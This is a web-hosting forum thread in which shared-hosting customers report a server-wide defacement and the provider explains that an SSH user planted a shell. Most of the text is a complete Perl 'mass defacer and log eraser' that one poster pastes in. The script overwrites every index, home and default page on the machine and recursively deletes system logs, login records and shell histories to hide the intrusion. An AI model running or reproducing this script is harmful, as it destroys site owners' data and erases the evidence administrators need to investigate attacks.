Shared PirateSolutions - Affordable and Reliable Hosting Solutions

Status
Not open for further replies.
Hello, I want to wish a Merry Christmas to you All, and thank PirateSolutions for the best service I ever had, not only for the great uptime and speed but for the support and friendly treatment all the time.

Thank you.
 
http://piratesolutions.com/ was hacked!

My site too. :'(

85023347.jpg

Shot at 2009-12-26
 
Yea, now i cant access in my cPanel... all is down curently

I know that these two fuckers read thread now, and I know and promise you I will find you ...
 
my site is too hacked :@ i upload my site and reload it and has been hacked X-(X-(X-( i know who is rootboy is my old friend and i ask him why hack my host and he is say because is was unpatched kernel X-(X-( but he dont know my site is in this server ::@X-(:(
 
As per the defacer mentioned he has deleted only index.php or index.html file . which makes ur database is safe if the piratesolutions guys still have the control of their server.

Just ask them regarding databases or solve the issue.
 
Yea i think that is only index file deleted , now im not sure but this server is dead ? im sure that HostPirate have backup for all site but i dont know what they are doing now :S
I dont have any contact mail for this guy...
 
I sent an e-mail to support yesterday, still haven't gotten back to me.

I'm pretty sure these hackers only delete the index files. They've done it before to hundreds of sites in the past.

The rest of the files and the databases should be untouched. Pirate Solutions should give us access so at least I can move my sites to another host.

This is beyond ridiculous
 
Hello there,

We had given SSH access to a client on request for his hosting account.

Someone misused his privileges and trans planted a shell with the help of pre-written perl scripts, changing the httpd config and putting up the page.

As he claims to be keylogged, but still we have got rid of him from the servers.

The DATA is TOTALLY Safe, we are just going through each file to assure things go stable.

We value each of our clients, hence all clients will be given an extra week to compensate for the downtime.


Dedicated Servers are up and running as usual.

We apologies for the inconvenience but we have to do all the necessary upgrades and procedure to ensure that such things do not repeat back.
 
this hacker is my old friend and he say only index is changed whith defacet but all index in ours sites

and he give me script here is

Code:
#!/usr/bin/perl 
use strict; 
my $index = $ARGV[0]; 
if ($ARGV[0]) 
{ 
 if( -e $index ) 
 { 
  system "echo -e \"\033[01;34mStarted MSRml V0.1 by PRI[ll Ok !!\033[01;37m\"\n"; 
  system "echo -e \"\\033[01;37mDefacing all homepages ...\"\n"; 
  system "find / -name \"index*\" -exec cp $index {} \\;"; 
  system "find / -name \"main*\" -exec cp $index {} \\;"; 
  system "find / -name \"home*\" -exec cp $index {} \\;"; 
  system "find / -name \"default*\" -exec cp $index {} \\;"; 
  system "echo -e \"\\033[01;37m[+] done ! all sites in this box should be defaced !\"\n"; 
  system "echo -e \"\\033[01;37m----------------------------------------------------------\"\n"; 
  system "echo -e \"\\033[01;37mCleaning up logs ...\"\n"; 
  system "echo -e \"\033[01;34m---------erasing default log files (too fast =))---------\033[01;37m\"\n"; 
    if( -e "/var/log/lastlog" ) 
      { 
       system 'rm -rf /var/log/lastlog'; 
       system "echo -e \"\\033[01;37m 
[*]/var/log/lastlog -erased Ok\"\n"; 
      } 
     else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/log/lastlog - No such file or directory\\033[01;37m\"\n"; 
      } 
     if( -e "/var/log/wtmp" ) 
      { 
       system 'rm -rf /var/log/wtmp'; 
       system "echo -e \"\\033[01;37m 
[*]/var/log/wtmp -erased Ok\"\n"; 
      } 
     else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/log/wtmp - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/etc/wtmp" ) 
      { 
       system 'rm -rf /etc/wtmp'; 
       system "echo -e \"\\033[01;37m 
[*]/etc/wtmp -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/etc/wtmp - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/var/run/utmp" ) 
      { 
       system 'rm -rf /var/run/utmp'; 
       system "echo -e \"\\033[01;37m 
[*]/var/run/utmp -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/run/utmp - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/etc/utmp" ) 
      { 
       system 'rm -rf /etc/utmp'; 
       system "echo -e \"\\033[01;37m 
[*]/etc/utmp -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/etc/utmp - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/var/log" ) 
      { 
       system 'rm -rf /var/log'; 
       system "echo -e \"\\033[01;37m 
[*]/var/log -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/log - No such file or directory\\033[01;37m\"\n"; 
      } 
       if( -e "/var/logs" ) 
      { 
       system 'rm -rf /var/logs'; 
       system "echo -e \"\\033[01;37m 
[*]/var/logs -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/logs - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/var/adm" ) 
      { 
       system 'rm -rf /var/adm'; 
       system "echo -e \"\\033[01;37m 
[*]/var/adm -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/adm - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/var/apache/log" ) 
      { 
       system 'rm -rf /var/apache/log'; 
       system "echo -e \"\\033[01;37m 
[*]/var/apache/log -erased Ok\"\n"; 
      } 
   else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/apache/log - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/var/apache/logs" ) 
      { 
       system 'rm -rf /var/apache/logs'; 
       system "echo -e \"\\033[01;37m 
[*]/var/apache/logs -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/var/apache/logs - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/usr/local/apache/log" ) 
      { 
       system 'rm -rf /usr/local/apache/log'; 
       system "echo -e \"\\033[01;37m 
[*]/usr/local/apache/log -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/usr/local/apache/log - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/usr/local/apache/logs" ) 
      { 
       system 'rm -rf /usr/local/apache/logs'; 
       system "echo -e \"\\033[01;37m 
[*]/usr/local/apache/logs -erased Ok\"\n"; 
      } 
   else 
      { 
       system "echo -e \"\\033[01;31m
[*]/usr/local/apache/logs - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/root/.bash_history" ) 
      { 
       system 'rm -rf /root/.bash_history'; 
       system "echo -e \"\\033[01;37m 
[*]/root/.bash_history -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/root/.bash_history - No such file or directory\\033[01;37m\"\n"; 
      } 
    if( -e "/root/.ksh_history" ) 
      { 
       system 'rm -rf /root/.ksh_history'; 
       system "echo -e \"\\033[01;37m 
[*]/root/.ksh_history -erased Ok\"\n"; 
      } 
    else 
      { 
       system "echo -e \"\\033[01;31m
[*]/root/.ksh_history - No such file or directory\\033[01;37m\"\n"; 
      } 
  system "echo -e \"\\033[01;37m[+] -----done all default log and bash_history files erased !!\"\n"; 
  system "echo -e \"\033[01;34m---------Now Erasing the rest of the machine log files (can be long :S)---------\033[01;37m\"\n"; 
  system 'find / -name *.bash_history -exec rm -rf {} \;'; 
  system "echo -e \"\\033[01;37m
[*] all *.bash_history files -erased Ok!\"\n"; 
  system 'find / -name *.bash_logout -exec rm -rf {} \;'; 
  system "echo -e \"\\033[01;37m
[*] all *.bash_logout files -erased Ok!\"\n"; 
  system 'find / -name "log*" -exec rm -rf {} \;'; 
  system "echo -e \"\\033[01;37m
[*] all log* files -erased Ok!\"\n"; 
  system 'find / -name *.log -exec rm -rf {} \;'; 
  system "echo -e \"\\033[01;37m
[*] all *.log files -erased Ok!\"\n"; 
  system "echo -e \"\033[01;34m-------[+] !done all log files erased![+]-------\033[01;37m\"\n"; 
  system "echo -e \"\033[01;34m---------------------------------------------------\033[01;37m\"\n"; 
  system "echo -e \"\033[01;34m-----------------MSRml V 0.1----------------------\033[01;37m\"\n"; 
} 
 else 
 { 
 system "echo -e \"\\033[01;31m[-] Failed ! the path to u're index could not be found !\\033[01;37m\"\n"; 
 exit; 
 } 
} 
else 
{ 
system "echo -e \"\\033[01;37m!!mass defacer and log eraser !!\"\n"; 
system "echo -e \"\\033[01;37m!!!!!!!!!!!!!!!!!! 
[ll!!!!!!!!!!!!!!!!!!!!!!!!\"\n"; 
system "echo -e \"\\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\\033[01;37m\"\n"; 
system "echo -e \"\\033[01;37musage : perl $0 <path too u're index>\"\n"; 
system "echo -e \"\\033[01;37mexample : perl $0 /tmp/index.html\"\n"; 
exit; 
}
 
Status
Not open for further replies.
Back
Top